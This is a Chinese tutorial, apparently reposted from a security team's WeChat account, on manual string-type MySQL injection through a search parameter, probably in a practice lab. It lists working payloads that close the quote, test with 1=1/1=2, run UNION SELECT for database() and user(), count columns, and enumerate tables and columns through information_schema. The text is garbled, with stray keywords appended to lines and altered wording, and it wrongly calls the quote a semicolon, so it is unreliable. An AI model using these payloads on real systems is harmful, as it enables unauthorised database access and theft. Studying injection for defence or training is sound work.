Mysql字符型手工注入

01mysql


字符型注入_肯定注入点nginx

正常搜索框搜索数据,输入名字就能够查询对应数据sql

查看PHP核心代码数据库

解释:
安全

    1.红色箭头表示服务器经过GET请求把用户的kobe参数传到$name
服务器

    2.黄色方框表示传入数据库的查询语句
微信

加入恶意字符后,传入数据库的查询语句以下:编辑器

select id,email from member where username='kobe''
很明显kobe'传入查询的时候,后面的的分号与前面查询语句的分号闭合,查询语句多出一个分号,查询语句不成立,致使报错。

注入点测试,将payload1代入查询测试

kobe' and 1=1 #
payload解释:
利用分号闭合查询语句中的分号,再经过#注释掉查询语句中后面的分号,则传入数据库查询语句以下:
select id,email from member where username='kobe' and 1=1 #'
成功查询到指定数据

kobe' and 1=2 #


02spa


字符型注入_获取基本信息

在这里基本肯定注入点,查看当前数据库和用户

kobe' union select database(),user()#
成功查询到数据库信息

传入数据库的查询命令以下

select id,email from member where username='kobe' union select database(),user()#'
因而可知payload只要在黄色区间内,在足够权限和符合语句逻辑状态下能够任意执行sql语句


👇经常使用查询语句👇

肯定当前字段

kobe' order by 3#

查询指定库全部数据

kobe' union select table_name,2,3 from information_schema.tables where (table_schema='数据库名')#

查询指定表的全部表头

kebo' union select column_name,2,3 from information_schema.columns where (table_name="表名")#

查看指定表头内容

kebo' union select 表头1,2,表头2 from 表名#

注释:注入方法与数字型注入基本相同,只要在闭合与注释符二者区间内执行mysql命令便可利用该漏洞,从这部分开始,后续不作详细介绍与演示。

本文分享自微信公众号 - Khan安全团队(KhanCJSH)。
若有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一块儿分享。

相关文章
相关标签/搜索